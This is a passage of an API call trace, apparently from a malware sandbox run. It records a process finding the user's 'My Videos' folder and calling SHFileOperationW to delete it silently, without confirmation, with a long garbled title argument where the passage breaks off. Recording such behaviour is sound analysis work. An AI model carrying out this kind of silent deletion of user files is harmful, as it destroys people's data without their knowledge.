hHeap=0x25c0000) returned 1 [0265.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0265.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0265.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0265.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0265.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0265.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0265.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x64) returned 0x24202f0 [0265.175] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/My Videos", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpFilePart=0x8bedfc*="My Videos") returned 0x31 [0265.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0265.175] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my videos")) returned 0x2416 [0265.175] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x25c0000, ftCreationTime.dwLowDateTime=0x4a82e4, ftCreationTime.dwHighDateTime=0x1580012, ftLastAccessTime.dwLowDateTime=0x1db0, ftLastAccessTime.dwHighDateTime=0x13a0021, ftLastWriteTime.dwLowDateTime=0x20502, ftLastWriteTime.dwHighDateTime=0x4a8178, nFileSizeHigh=0x74f605ba, nFileSizeLow=0x25c6d68, dwReserved0=0x1db0, dwReserved1=0x4, cFileName="", cAlternateFileName="")) returned 0xffffffff [0265.175] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0265.175] GetLastError () returned 0x6 [0265.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.176] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0265.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0265.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0265.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0265.177] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0265.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0265.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa050 [0265.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0265.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0265.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e10 [0265.177] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0265.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0265.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0265.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0265.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0265.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0265.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.179] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/My Videos", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpFilePart=0x8bf658*="My Videos") returned 0x31 [0265.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0265.179] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my videos")) returned 0x2416 [0265.179] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x